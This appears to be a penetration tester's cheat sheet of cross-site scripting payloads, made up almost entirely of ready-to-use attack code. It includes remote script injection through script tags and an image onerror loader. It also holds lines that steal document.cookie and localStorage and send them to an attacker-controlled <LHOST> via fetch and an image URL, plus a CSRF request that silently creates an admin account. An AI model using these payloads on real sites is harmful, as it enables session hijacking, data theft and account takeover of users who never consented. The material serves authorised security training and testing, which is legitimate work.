% xss

# remote
echo "alert(1)" > xss.js
<script src="http://<LHOST>/xss.js"></script>

# remote dom img example
<img src="invalid-image" onerror="var script = document.createElement('script'); script.src='http://<LHOST>/xss.js'; document.body.appendChild(script);" />

# steal
let cookie = document.cookie
let encodedCookie = encodeURIComponent(cookie)
fetch("http://<LHOST>/exfil?data=" + encodedCookie)
let data = JSON.stringify(localStorage)
let encodedData = encodeURIComponent(data)
fetch("http://<LHOST>/exfil?data=" + encodedData)
document.write('<img src="http://<LHOST>:80/?bogus='+document.cookie+'" />');

# csrf add user (must know API first)
var xhttp = new XMLHttpRequest();
var creds = 'email=offsec@offsec.local&password=offsec&name=offsec&username=offsec';
xhttp.open("GET", "/admin/users/add?" + creds, true);
xhttp.send();

$ LHOST: ip -f inet addr show tun0 | sed -En -e 's/.*inet ([0-9.]+).*/\1/p'
